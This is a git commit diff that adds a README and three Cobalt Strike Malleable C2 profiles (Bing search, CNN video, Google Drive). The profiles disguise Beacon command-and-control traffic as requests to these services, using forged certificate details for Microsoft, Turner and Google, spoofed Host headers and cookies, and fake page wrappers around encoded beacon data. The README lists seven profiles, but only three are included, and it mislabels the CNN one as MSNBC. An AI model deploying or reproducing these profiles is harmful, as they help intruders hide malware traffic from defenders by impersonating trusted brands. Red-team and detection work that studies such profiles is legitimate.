initial commit

LICENSE

@@ -1,6 +1,6 @@
 BSD 3-Clause License
 
-Copyright (c) 2016, Jeff
+Copyright (c) 2016, Jeff Dimmock
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without

README.md

@@ -1,2 +1,16 @@
 # MalleableC2Profiles
-Malleable C2 profiles for Cobalt Strike
+Malleable C2 profiles for Cobalt Strike version 3.6+
+
+*bingsearch_getonly.profile* - Bing web search profile, uses GET requests only
+
+*cnnvideo_getonly.profile* - MSNBC live video straming profile, uses GET requests only
+
+*googledrive_getonly.profile* - Google Drive document viewer profile, uses GET requests only
+
+*microsoftupdate_getonly.profile* - Microsoft Update application profile, uses GET requests only
+
+*msnbcvideo_getonly.profile* - MSNBC live video straming profile, uses GET requests only
+
+*onedrive_getonly.profile* - One Drive document viewer profile, uses GET requests only
+
+*wikipedia_getonly.profile* - Wikipedia web search profile, uses GET requests only

bingsearch_getonly.profile

@@ -0,0 +1,115 @@
+#
+# Bing Web Search
+# 
+# Author: @bluscreenofjeff
+#
+
+https-certificate {
+    set CN       "www.bing.com";
+    set O        "Microsoft Corporation";
+    set C        "US";
+    set L        "Redmond";
+    set OU       "Microsoft IT";
+    set ST       "WA";
+    set validity "365";
+}
+
+set sleeptime "60000";
+set jitter    "20";
+set useragent "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
+set dns_idle "8.8.4.4";
+set maxdns    "235";
+
+http-get {
+
+    set uri "/search/";
+
+    client {
+
+        header "Host" "www.bing.com";
+        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
+        header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG"; 
+
+        metadata {
+            base64url;
+            parameter "q";
+        }
+
+        parameter "go" "Search";
+        parameter "qs" "bs";
+        parameter "form" "QBRE";
+
+
+    }
+
+    server {
+
+        header "Cache-Control" "private, max-age=0";
+        header "Content-Type" "text/html; charset=utf-8";
+        header "Vary" "Accept-Encoding";
+        header "Server" "Microsoft-IIS/8.5";
+        header "Connection" "close";
+
+
+        output {
+            netbios;
+            prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&amp;q=canary&amp;go=Search&amp;qs=bs&amp;form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&amp;q=canary&amp;go=Search&amp;qs=bs&amp;form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
+            append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
+            print;
+        }
+    }
+}
+
+http-post {
+
+    set uri "/Search/";
+    set verb "GET";
+
+    client {
+
+        header "Host" "www.bing.com";
+        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
+        header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG"; 
+
+        output {
+            base64url;
+            parameter "q";
+        }
+
+        parameter "go" "Search";
+        parameter "qs" "bs";
+
+        id {
+            base64url;
+            parameter "form";
+        }
+    }
+
+    server {
+
+        header "Cache-Control" "private, max-age=0";
+        header "Content-Type" "text/html; charset=utf-8";
+        header "Vary" "Accept-Encoding";
+        header "Server" "Microsoft-IIS/8.5";
+        header "Connection" "close";
+
+
+        output {
+            netbios;
+            prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&amp;q=canary&amp;go=Search&amp;qs=bs&amp;form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&amp;q=canary&amp;go=Search&amp;qs=bs&amp;form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
+            append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
+            print;
+        }
+    }
+}
+
+http-stager {
+    server {
+        header "Cache-Control" "private, max-age=0";
+        header "Content-Type" "text/html; charset=utf-8";
+        header "Vary" "Accept-Encoding";
+        header "Server" "Microsoft-IIS/8.5";
+        header "Connection" "close";
+    }
+}
+

cnnvideo_getonly.profile

@@ -0,0 +1,121 @@
+#
+# CNN Video
+# 
+# Author: @bluscreenofjeff
+#
+
+#set https cert info
+# CNN doesnt have real cert, guessed details
+https-certificate {
+    set CN       "www.cnn.com"; #Common Name
+    set O        "Turner Broadcasting System Inc"; #Organization Name
+    set C        "US"; #Country
+    set L        "Atlanta"; #Locality
+    set OU       "MSS (Media Software & Services)"; #Organizational Unit Name
+    set ST       "GA"; #State or Province
+    set validity "365"; #Number of days the cert is valid for
+}
+
+#default Beacon sleep duration and jitter
+set sleeptime "60000";
+set jitter    "20";
+
+#default useragent for HTTP comms
+set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
+
+#IP address used to indicate no tasks are available to DNS Beacon
+set dns_idle "8.8.4.4";
+
+#Force a sleep prior to each individual DNS request. (in milliseconds)
+set dns_sleep "0";
+
+#Maximum length of hostname when uploading data over DNS (0-255)
+set maxdns    "235";
+
+http-get {
+
+    set uri "/cnn/cnnx/dai/hds/stream_hd/1/cnnxlive1_4.bootstrap";
+
+    client {
+
+        header "Host" "phds-live.cdn.turner.com";
+        header "X-Requested-With" "ShockwaveFlash/24.0.0.186";
+        header "Referer" "http://go.cnn.com/?stream=cnn&sr=watchHPbutton";
+
+        #session metadata
+        metadata {
+            base64url;
+            parameter "g";
+        }
+
+        parameter "hdcore" "3.4.1";
+        parameter "plugin" "aasp-3.4.1.1.1";
+    }
+
+
+    server {
+
+
+        header "Server" "ngx_openresty";
+        header "Content-Type" "application/octet-stream";
+        header "ETag" "dbbece0334279b5bfbf88c27bda56444";
+        header "Cache-Control" "max-age=1";
+        header "Connection" "keep-alive";
+
+        #Beacon's tasks
+        output {
+
+            print;
+        }
+    }
+}
+
+http-post {
+
+    set uri "/cnn/cnnx/dai/hds/stream_hd/2/cnnxlive1_4.bootstrap";
+    set verb "GET";
+
+    client {
+
+        header "Host" "phds-live.cdn.turner.com";
+        header "X-Requested-With" "ShockwaveFlash/24.0.0.186";
+
+
+        #session ID
+        id {
+            base64url;
+            prepend "http://go.cnn.com/?stream=cnn&sr=watchHPbutton&token=";
+            header "Referer";
+        }
+
+        #Beacon's responses
+        output {
+            base64url;
+            parameter "g";
+        }
+
+        parameter "hdcore" "3.4.1";
+        parameter "plugin" "aasp-3.4.1.1.1";
+    }
+
+    server {
+
+        header "Server" "ngx_openresty";
+        header "Content-Type" "application/octet-stream";
+        header "ETag" "dbbece0334279b5bfbf88c27bda56444";
+        header "Cache-Control" "max-age=1";
+        header "Connection" "keep-alive";
+
+        #empty
+        output {
+            print;
+        }
+    }
+}
+
+#change the stager server
+http-stager {
+    server {
+        header "Content-Type" "application/octet-stream";
+    }
+}

googledrive_getonly.profile

@@ -0,0 +1,125 @@
+#
+# Google Drive
+# 
+# Author: @bluscreenofjeff
+#
+
+#set https cert info
+https-certificate {
+    set CN       "*.google.com"; #Common Name
+    set O        "Google Inc"; #Organization Name
+    set C        "US"; #Country
+    set L        "Mountain View"; #Locality
+    set ST       "California"; #State or Province
+    set validity "365"; #Number of days the cert is valid for
+}
+
+#default Beacon sleep duration and jitter
+set sleeptime "60000";
+set jitter    "20";
+
+#default useragent for HTTP comms
+set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
+
+#IP address used to indicate no tasks are available to DNS Beacon
+set dns_idle "8.8.4.4";
+
+#Force a sleep prior to each individual DNS request. (in milliseconds)
+set dns_sleep "0";
+
+#Maximum length of hostname when uploading data over DNS (0-255)
+set maxdns    "235";
+
+http-get {
+
+    set uri "/viewerng/meta";
+
+    client {
+
+        header "Accept" "text/html,application/xml;*/*;";
+        header "Accept-Encoding" "gzip, deflate";
+        header "Host" "drive.google.com";
+        header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
+
+        #session metadata
+        metadata {
+            base64url;
+            netbios;
+            base64url;
+            parameter "id";
+        }
+
+        parameter "u" "0";
+    }
+
+    server {
+        header "Content-Type" "application/json; charset=utf-8";
+        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
+        header "Pragma" "no-cache";
+        header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
+        header "X-Content-Type-Options" "nosniff";
+        header "X-Frame-Options" "SAMEORIGIN";
+        header "X-XSS-Protection" "1; mode=block";
+        header "Server" "GSE";
+        header "Connection" "close";
+
+
+        #Beacon's tasks
+        output {
+            print;
+        }
+    }
+}
+
+http-post {
+
+    set uri "/viewersng/meta";
+    set verb "GET";
+
+    client {
+
+        header "Accept" "text/html,application/xml;*/*;";
+        header "Accept-Encoding" "gzip, deflate";
+        header "Host" "drive.google.com";
+        header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
+
+
+        output {
+            base64url;
+            netbios;
+            base64url;
+            parameter "id";
+        }
+
+        #session ID
+        id {
+            parameter "u";
+        }
+    }
+
+    server {
+        header "Content-Type" "application/json; charset=utf-8";
+        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
+        header "Pragma" "no-cache";
+        header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
+        header "X-Content-Type-Options" "nosniff";
+        header "X-Frame-Options" "SAMEORIGIN";
+        header "X-XSS-Protection" "1; mode=block";
+        header "Server" "GSE";
+        header "Connection" "close";
+
+
+        output {
+            print;
+        }
+    }
+}
+
+#change the stager server
+http-stager {
+    server {
+        header "Content-Type" "application/json; charset=utf-8";
+        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
+        header "Pragma" "no-cache";
+    }
+}